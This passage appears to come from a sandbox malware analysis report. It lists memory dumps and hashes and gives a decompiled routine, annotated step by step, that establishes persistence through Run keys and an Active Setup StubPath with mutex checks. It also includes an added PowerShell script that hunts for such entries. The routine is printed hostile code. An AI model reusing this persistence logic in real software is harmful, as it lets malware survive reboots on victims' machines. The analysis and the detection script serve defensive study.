                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: FreeLocalStringTime
                  • String ID:
                  • API String ID: 4115487899-0
                  • Opcode ID: 080143b38f47a14bc7abd16a6aa459c922e841604fcb300ac30b8a9b522506b0
                  • Instruction ID: 6c50818c357f400c33ad67fb0aa65d9f8c3d174c8eb37c65fd316cc4577b83bf
                  • Opcode Fuzzy Hash: 080143b38f47a14bc7abd16a6aa459c922e841604fcb300ac30b8a9b522506b0
                  • Instruction Fuzzy Hash: E051F17890405DABFB05DB94CC41DFFB7BBEF89380FA08066F440B6259DE35AE458A60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 10006507
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: NtdllProc_Window
                  • String ID:
                  • API String ID: 4255912815-0
                  • Opcode ID: a36e2596e50cbdcff5ffa68e6a1e7b8638978eb7ec4bb7942f87b3b5f9b64d97
                  • Instruction ID: d91e40c9a86a1603bffb38651a5b716410016987c82cb3399e660d7322f9702c
                  • Opcode Fuzzy Hash: a36e2596e50cbdcff5ffa68e6a1e7b8638978eb7ec4bb7942f87b3b5f9b64d97
                  • Instruction Fuzzy Hash: 23014B7A80E3C55FC703DF7898A55413FB9AE5B24070F04D7E484CF0A3E6685858CB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,10004AEA), ref: 10004AAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: InfoLocale
                  • String ID:
                  • API String ID: 2299586839-0
                  • Opcode ID: efe5643a6653c0d33cbe588f2399e79e61fc0be940d45b1ddb6cbc9784bd52bb
                  • Instruction ID: a6b1d0fb2cc725cd67dae8327f47cbfeb89b8e8f14ee4b1b67c3bb55e1ee9b21
                  • Opcode Fuzzy Hash: efe5643a6653c0d33cbe588f2399e79e61fc0be940d45b1ddb6cbc9784bd52bb
                  • Instruction Fuzzy Hash: F8F0C274A08209AFFB01DEA1CC51AEFB3BAFB85350F40C835E11066588EBB43A04C695
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 1000AF81
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: NtdllProc_Window
                  • String ID:
                  • API String ID: 4255912815-0
                  • Opcode ID: d3956dd715256d4decada7e69221bfc1ce5d5ef765fdf7dd91a78ac1ce545737
                  • Instruction ID: 8e78343bb29869cc51209ea075ef4b030323b4b60e46301b02e33cef73b8dc7b
                  • Opcode Fuzzy Hash: d3956dd715256d4decada7e69221bfc1ce5d5ef765fdf7dd91a78ac1ce545737
                  • Instruction Fuzzy Hash: 0DE0EDB67051905FA711CAAE98C486ABBEDDF8A19130981A6F548CB21AC664EC418760
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 10006507
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: NtdllProc_Window
                  • String ID:
                  • API String ID: 4255912815-0
                  • Opcode ID: 91a85faddc0a6b7c48ccd8513a21e82de454515e62290299adcaadae15e2c70d
                  • Instruction ID: 436466b3821b95b6b86dd239864fdc8ccfeb13c66957006ad6da2fca92e58a32
                  • Opcode Fuzzy Hash: 91a85faddc0a6b7c48ccd8513a21e82de454515e62290299adcaadae15e2c70d
                  • Instruction Fuzzy Hash: A1D002BA20420DAF8B40DEDDEC81E9B33ECAB0C650B008411BA18C7205CA70F9609B75
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 65e1b0b0bfc971ea17c953731613e9d38bff3bc8381f0b4d43f7e2df5469c182
                  • Instruction ID: c2155be9a22ec35cc72a5576a491537a18d16551030b1ccac5dfc047acf1e890
                  • Opcode Fuzzy Hash: 65e1b0b0bfc971ea17c953731613e9d38bff3bc8381f0b4d43f7e2df5469c182
                  • Instruction Fuzzy Hash: 60519D6150E7D09FC7138BB48C696827FB0AF17214B0E49DBD4C18F8A3E258681AD723
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 051106af2b34cd8f61e02f315e16c27509e72fe1c943acd15263117665369d96
                  • Instruction ID: 045499a1225f0b0c77b71ec5cad36c083544a06841ea1a5221bd3b2b54e25d63
                  • Opcode Fuzzy Hash: 051106af2b34cd8f61e02f315e16c27509e72fe1c943acd15263117665369d96
                  • Instruction Fuzzy Hash: 0041249428E3C49FC32787B10CBE281BFA16D47008B5988EFDAC54ACA3D515251FCB27
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 69ba89bcd680b66bd704abd3acc838314031b346093b05974a042093b8111a6c
                  • Instruction ID: 882b185211b792b8c5052c84d649f19989d8332f3aceee9526a096d5013ac9ab
                  • Opcode Fuzzy Hash: 69ba89bcd680b66bd704abd3acc838314031b346093b05974a042093b8111a6c
                  • Instruction Fuzzy Hash: D441029429E3C49FC32787B50CBE281BFA16D47008B5988EFDAD14ADA3D515291FCB27
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fec516accf8aee0f52b093b2999d0238f6fe2619349a957812e2857e0ca0752a
                  • Instruction ID: fb9c58e4edd8cd6f8191b68a5e242de076d7f94a0d77c4bc5c89148ebc96a7aa
                  • Opcode Fuzzy Hash: fec516accf8aee0f52b093b2999d0238f6fe2619349a957812e2857e0ca0752a
                  • Instruction Fuzzy Hash: 2D210A7005D7C09FC723CBB4C8A9502BFF0BF5B20474988CFC9968B8A2D625A425DB13
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E1000C9D0(intOrPtr _a4) {             // _a4: pointer to the embedded configuration block; the +0x... offsets below are fields in it
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				char _v20;
                  				char _v24;
                  				char _v28;
                  				char _v32;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				char _v48;
                  				char _v52;
                  				char _v56;
                  				char _v60;
                  				char _v64;
                  				char _v68;
                  				char _v72;
                  				char _v76;
                  				void* _v80;
                  				char _v84;
                  				char _v88;
                  				WCHAR* _t103;
                  				void* _t116;
                  				void* _t128;
                  				intOrPtr _t171;
                  				void* _t172;
                  				char* _t198;
                  				void* _t208;
                  				short* _t211;
                  				void* _t212;
                  				void* _t213;
                  				intOrPtr _t215;
                  
                  				_t172 = 0xa;
                  				goto L1;
                  				while(1) {
                  					L5:
                  					// Persistence. Three config flags (+0xdbc, +0xdbd, +0xdbe) select the autostart location;
                  					// 0x80000002 = HKEY_LOCAL_MACHINE, 0x80000001 = HKEY_CURRENT_USER, _v16 = installed server path.
                  					_t219 =  *((char*)(_t171 + 0xdbc)) - 1;
                  					if( *((char*)(_t171 + 0xdbc)) == 1) {
                  						E100038E0( &_v76, 0x3d, _t171 + 0xc4e);                              // value name from config
                  						E1000577C(0x80000002, _t171, _v76, _v28, _t212, _t219, 2, _v16);    // HKLM\...\CurrentVersion\Run\<name> = server path
                  					}
                  					_t220 =  *((char*)(_t171 + 0xdbd)) - 1;
                  					if( *((char*)(_t171 + 0xdbd)) == 1) {
                  						E100038E0( &_v80, 0x3d, _t171 + 0xcc8);                              // value name from config
                  						_t184 = _v80;
                  						E1000577C(0x80000001, _t171, _v80, _v28, _t212, _t220, 2, _v16);    // HKCU\...\CurrentVersion\Run\<name> = server path
                  					}
                  					_t221 =  *((char*)(_t171 + 0xdbe)) - 1;
                  					if( *((char*)(_t171 + 0xdbe)) == 1) {
                  						SHDeleteKeyW(0x80000001, E1000390C(_v20));                           // drop the per-user copy of the component key so Active Setup re-runs the stub at next logon
                  						_t184 = L"StubPath";
                  						E1000577C(0x80000002, _t171, L"StubPath", _v20, _t212, _t221, 2, _v16);   // HKLM\...\Active Setup\Installed Components\<name>\StubPath = server path
                  					}
                  					_t211 = E1000390C(_v16);                                                 // server path as PWideChar
                  					_t128 = E10005CA4(_t211);
                  					_t222 = _t128;
                  					if(_t128 == 0) {
                  						E10005D78(_v16, _t171, _t184,  &_v84, _t211, _t212, _t222);
                  						if(E10005690(E1000390C(_v84)) != 0) {
                  							_push(_v40);
                  							_push(_v44);
                  							_t208 = E1000390C(_v24);
                  							E10005EB4(_t211, _t208);
                  							_t224 =  *((char*)(_t171 + 0xbd1)) - 1;
                  							if( *((char*)(_t171 + 0xbd1)) == 1) {
                  								E10005D78(_v16, _t171, _t184,  &_v88, _t211, _t212, _t224);
                  								E10005F1C(_v88, _t171, _t184, _t212);
                  								E10005F1C(_v16, _t171, _t184, _t212);
                  							}
                  						}
                  					}
                  					_t213 = E10004DF0(0, 0, _t171 + 0xfaa);                                  // create a named kernel object from the same config string used for the registry key name
                  					if(GetLastError() == 0xb7) {                                             // ERROR_ALREADY_EXISTS: the installed copy is already running
                  						CloseHandle(_t213);
                  					} else {
                  						CloseHandle(_t213);
                  						ShellExecuteW(0, L"open", _t211, 0, 0, "jjj");                       // start the installed copy ("jjj" is a decompiler artefact in the nShowCmd slot)
                  					}
                  					Sleep(0x1388);                                                           // 5000 ms
                  					_t212 = E10004DF0(0, 0, _t171 + 0x1024);                                 // second named object
                  					if(GetLastError() != 0xb7) {
                  						CloseHandle(_t212);
                  					} else {
                  						ExitProcess(0);                                                      // the launched copy now owns it: this instance exits
                  					}
                  				}
                  				L3:
                  				// Build "SOFTWARE\<config name>" under HKCU and poll its "ServerName" value once a second until it is set.
                  				E100034B0( &_v56, 0x3d, _t171 + 0xfaa);
                  				E1000352C( &_v52, _v56, "SOFTWARE\\");
                  				E100038FC( &_v48, _v52);
                  				E1000553C(0x80000001, _t171, L"ServerName", _v48, _t212,  &_v16, 0);        // read HKCU\SOFTWARE\<name>\ServerName into _v16
                  				Sleep(0x3e8);                                                                // 1000 ms
                  				E10003A34(_v16, 0);                                                          // compare with the empty string
                  				if(0 == 0) {                                                                 // decompiler lost the compare result; the loop repeats while ServerName is empty
                  					goto L3;
                  				} else {
                  					E100034B0( &_v64, 0x3d, _t171 + 0xfaa);
                  					E1000352C( &_v60, _v64, "SOFTWARE\\");
                  					E100038FC( &_v8, _v60);
                  					E100037D0( &_v12, L"ServerName");
                  					_t103 = E1000390C(_v12);
                  					SHDeleteValueW(0x80000001, E1000390C(_v8), _t103);                       // remove the hand-off value once consumed
                  					E100037D0( &_v28, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run");  // Run key path used at L5
                  					E100034B0( &_v72, 0x3d, _t171 + 0xd42);                                  // Active Setup component name from config
                  					E1000352C( &_v68, _v72, "Software\\Microsoft\\Active Setup\\Installed Components\\");
                  					E100038FC( &_v20, _v68);                                                 // Active Setup component key path used at L5
                  					_t116 = E1000390C(_v16);
                  					_t198 =  &_v32;
                  					_v44 = E10005E30(_t116, _t198);
                  					_v40 = _t198;
                  					E10003BE4( &_v24, E10003FD4(_v44, _v40, 2, 0));
                  					E100050D0(E1000390C(_v24), _v32);
                  					goto L5;
                  				}
                  				L1:
                  				// Delphi prologue: push zero dwords to initialise the string locals.
                  				_push(0);
                  				_push(0);
                  				_t172 = _t172 - 1;
                  				if(_t172 != 0) {
                  					goto L1;
                  				} else {
                  					_push(_t172);
                  					_push(_t212);
                  					_t171 = _a4;
                  					_push(0x1000cd6b);
                  					_push( *[fs:eax]);
                  					 *[fs:eax] = _t215;                  // install try/finally SEH frame
                  					LoadLibraryA("advapi32.dll");        // pre-load the system DLLs used below (shell32.dll is requested twice)
                  					LoadLibraryA("kernel32.dll");
                  					LoadLibraryA("shell32.dll");
                  					LoadLibraryA("mpr.dll");
                  					LoadLibraryA("version.dll");
                  					LoadLibraryA("comctl32.dll");
                  					LoadLibraryA("gdi32.dll");
                  					LoadLibraryA("opengl32.dll");
                  					LoadLibraryA("user32.dll");
                  					LoadLibraryA("wintrust.dll");
                  					LoadLibraryA("msimg32.dll");
                  					LoadLibraryA("shell32.dll");
                  					E10004DF0(0, 0, _t171 + 0x109e);     // first named object; its result is not checked here
                  					goto L3;
                  				}
                  			}
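                  The routine above writes its autostart entry to one of three places chosen by config flags: a value under HKLM\...\CurrentVersion\Run, a value under HKCU\...\CurrentVersion\Run, or a StubPath under HKLM\Software\Microsoft\Active Setup\Installed Components\<name>. The value and component names come from the embedded configuration, so they cannot be hardcoded into a check. The following PowerShell script is an added triage aid written for this page; it is not part of the sample or of the Joe Sandbox report. It enumerates those three locations on a live host, extracts the executable from each command line, and flags entries whose target is missing, sits under a user-writable or temporary directory, or lacks a valid Authenticode signature. The directory list and the signature heuristic are assumptions chosen for triage, not behaviour taken from the sample.

```powershell
# Added triage script for the persistence locations used by the decompiled routine E1000C9D0.
# Not part of the sample or the report. Run in an elevated PowerShell to read HKLM fully.

$RunKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
)
$ActiveSetupKeys = @(
    'HKLM:\Software\Microsoft\Active Setup\Installed Components',
    'HKLM:\Software\Wow6432Node\Microsoft\Active Setup\Installed Components'
)

# Assumption: directories an unprivileged user can write to. A persistence target under one of
# these deserves a closer look; tune the list for your environment.
$UserWritableRoots = @(
    $env:APPDATA, $env:LOCALAPPDATA, $env:TEMP, $env:PUBLIC, $env:ProgramData,
    [Environment]::GetFolderPath('Startup'), [Environment]::GetFolderPath('CommonStartup')
) | Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') }

function Get-ExecutablePath {
    # Extract the executable from a command line such as "C:\p\x.exe" /a or C:\p\x.exe /a.
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $expanded = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($expanded.StartsWith('"')) {
        $end = $expanded.IndexOf('"', 1)
        if ($end -gt 0) { return $expanded.Substring(1, $end - 1) }
        return $expanded.Trim('"')
    }
    # Unquoted: take the longest leading run of tokens that names an existing file (paths with spaces).
    $parts = $expanded -split ' '
    for ($i = $parts.Count; $i -ge 1; $i--) {
        $candidate = ($parts[0..($i - 1)] -join ' ')
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $parts[0]
}

function Test-AutostartEntry {
    param([string]$Location, [string]$Name, [string]$CommandLine)
    $exe = Get-ExecutablePath $CommandLine
    if (-not $exe) { return $null }
    $reasons = @()
    if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) {
        $reasons += 'target missing on disk'
    } else {
        foreach ($root in $UserWritableRoots) {
            if ($exe.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) {
                $reasons += "target under user-writable path ($root)"; break
            }
        }
        $sig = Get-AuthenticodeSignature -LiteralPath $exe
        if ($sig.Status -ne 'Valid') { $reasons += "signature $($sig.Status)" }
    }
    [pscustomobject]@{
        Location    = $Location
        Name        = $Name
        CommandLine = $CommandLine
        Executable  = $exe
        Suspicious  = ($reasons.Count -gt 0)
        Reasons     = ($reasons -join '; ')
    }
}

$findings = @()

# Run keys: every value under the key is a command line executed at logon.
foreach ($key in $RunKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # skip registry-provider metadata properties
        $findings += Test-AutostartEntry $key $p.Name ([string]$p.Value)
    }
}

# Active Setup: each component's StubPath runs once per user at logon, which is what the
# sample abuses; legitimate entries here are almost all Microsoft-signed.
foreach ($key in $ActiveSetupKeys) {
    if (-not (Test-Path $key)) { continue }
    Get-ChildItem -Path $key | ForEach-Object {
        $stub = (Get-ItemProperty -Path $_.PSPath -Name StubPath -ErrorAction SilentlyContinue).StubPath
        if ($stub) { $findings += Test-AutostartEntry $_.PSPath $_.PSChildName $stub }
    }
}

$findings | Where-Object { $_ -and $_.Suspicious } |
    Format-Table Location, Name, Executable, Reasons -AutoSize -Wrap
```

A hit in the Active Setup branch is the more telling one: the sample deletes the per-user copy of the component key with SHDeleteKeyW so the HKLM StubPath is re-executed at the next logon, and very few non-Microsoft products register components there at all. A hit under a Run key is noisier; compare the flagged value name against the process tree and file drops in the rest of this report before acting on it.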
                  Instruction addresses (one per decompiled statement, in source order):
                  0x1000c9d3 0x1000c9d3 0x1000cbac 0x1000cbac 0x1000cbac 0x1000cbb3 0x1000cbc9 0x1000cbd9 0x1000cbd9 0x1000cbde
                  0x1000cbe5 0x1000cbfb 0x1000cc00 0x1000cc0b 0x1000cc0b 0x1000cc10 0x1000cc17 0x1000cc27 0x1000cc32 0x1000cc3f
                  0x1000cc3f 0x1000cc4c 0x1000cc50 0x1000cc55 0x1000cc57 0x1000cc5f 0x1000cc73 0x1000cc75 0x1000cc78 0x1000cc86
                  0x1000cc87 0x1000cc8c 0x1000cc93 0x1000cc9b 0x1000cca3 0x1000ccab 0x1000ccab 0x1000cc93 0x1000cc73 0x1000ccc0
                  0x1000cccc 0x1000ccea 0x1000ccce 0x1000cccf 0x1000cce2 0x1000cce2 0x1000ccf4 0x1000cd09 0x1000cd15 0x1000cd24
                  0x1000cd17 0x1000cd19 0x1000cd19 0x1000cd15 0x1000ca7c 0x1000ca90 0x1000caa0 0x1000caab 0x1000cabd 0x1000cac7
                  0x1000cad1 0x1000cad6 0x00000000 0x1000cad8 0x1000cae6 0x1000caf6 0x1000cb01 0x1000cb0e 0x1000cb16 0x1000cb2a
                  0x1000cb37 0x1000cb4a 0x1000cb5a 0x1000cb65 0x1000cb6d 0x1000cb72 0x1000cb7a 0x1000cb7d 0x1000cb94 0x1000cba7
                  0x00000000 0x1000cba7 0x1000c9d8 0x1000c9d8 0x1000c9da 0x1000c9dc 0x1000c9dd 0x00000000 0x1000c9df 0x1000c9df
                  0x1000c9e1 0x1000c9e3 0x1000c9e9 0x1000c9ee
                  0x1000c9f1
                  0x1000c9f9
                  0x1000ca03
                  0x1000ca0d
                  0x1000ca17
                  0x1000ca21
                  0x1000ca2b
                  0x1000ca35
                  0x1000ca3f
                  0x1000ca49
                  0x1000ca53
                  0x1000ca5d
                  0x1000ca67
                  0x1000ca77
                  0x00000000
                  0x1000ca77

                  APIs
                  • LoadLibraryA.KERNEL32(advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009,00000000,00000000), ref: 1000C9F9
                  • LoadLibraryA.KERNEL32(kernel32.dll,advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009,00000000,00000000), ref: 1000CA03
                  • LoadLibraryA.KERNEL32(shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009,00000000,00000000), ref: 1000CA0D
                  • LoadLibraryA.KERNEL32(mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009,00000000,00000000), ref: 1000CA17
                  • LoadLibraryA.KERNEL32(version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009,00000000,00000000), ref: 1000CA21
                  • LoadLibraryA.KERNEL32(comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009,00000000,00000000), ref: 1000CA2B
                  • LoadLibraryA.KERNEL32(gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009,00000000,00000000), ref: 1000CA35
                  • LoadLibraryA.KERNEL32(opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009,00000000), ref: 1000CA3F
                  • LoadLibraryA.KERNEL32(user32.dll,opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009), ref: 1000CA49
                  • LoadLibraryA.KERNEL32(wintrust.dll,user32.dll,opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B), ref: 1000CA53
                  • LoadLibraryA.KERNEL32(msimg32.dll,wintrust.dll,user32.dll,opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B), ref: 1000CA5D
                  • LoadLibraryA.KERNEL32(shell32.dll,msimg32.dll,wintrust.dll,user32.dll,opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B), ref: 1000CA67
                  • Sleep.KERNEL32(000003E8,?,00000000,00000000,00000000,?,shell32.dll,msimg32.dll,wintrust.dll,user32.dll,opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll), ref: 1000CAC7
                  • SHDeleteValueW.SHLWAPI(80000001,00000000,00000000,000003E8,?,00000000,00000000,00000000,?,shell32.dll,msimg32.dll,wintrust.dll,user32.dll,opengl32.dll,gdi32.dll,comctl32.dll), ref: 1000CB2A
                    • Part of subcall function 10005E30: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E67
                    • Part of subcall function 10005E30: GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E71
                    • Part of subcall function 10005E30: ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E99
                    • Part of subcall function 10005E30: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E9F
                  • SHDeleteKeyW.SHLWAPI(80000001,00000000,00000002,?,00000002,?,00000000,00000000,00000000,?,00001388,00000000,00000000,00000000,?), ref: 1000CC27
                  • GetLastError.KERNEL32(00000000,00000000,?), ref: 1000CCC2
                  • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,00000002,?,80000001,00000000,00000002,?,00000002,?,00000000,00000000), ref: 1000CCCF
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 1000CCE2
                  • CloseHandle.KERNEL32(00000000,00000000,00000000,?), ref: 1000CCEA
                  • Sleep.KERNEL32(00001388,00000000,00000000,00000000,?), ref: 1000CCF4
                  • GetLastError.KERNEL32(00000000,00000000,?,00001388,00000000,00000000,00000000,?), ref: 1000CD0B
                  • ExitProcess.KERNEL32(00000000,00000000,00000000,?,00001388,00000000,open,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000CD19
                    • Part of subcall function 1000577C: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 100057C2
                    • Part of subcall function 1000577C: RegSetValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057EE
                    • Part of subcall function 1000577C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057FD
                  • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00001388,00000000,00000000,00000000,?), ref: 1000CD24
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID: LibraryLoad$Close$Handle$File$CreateDeleteErrorLastSleepValue$ExecuteExitProcessReadShellSize
                  • String ID: SOFTWARE\$ServerName$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Run$StubPath$advapi32.dll$comctl32.dll$gdi32.dll$jjj$kernel32.dll$mpr.dll$msimg32.dll$open$opengl32.dll$shell32.dll$user32.dll$version.dll$wintrust.dll
                  • API String ID: 570719760-3930227570
                  • Opcode ID: 80134d6693af9d9d1c102747081ac19f927ab45dec72332da694b67f7ee99457
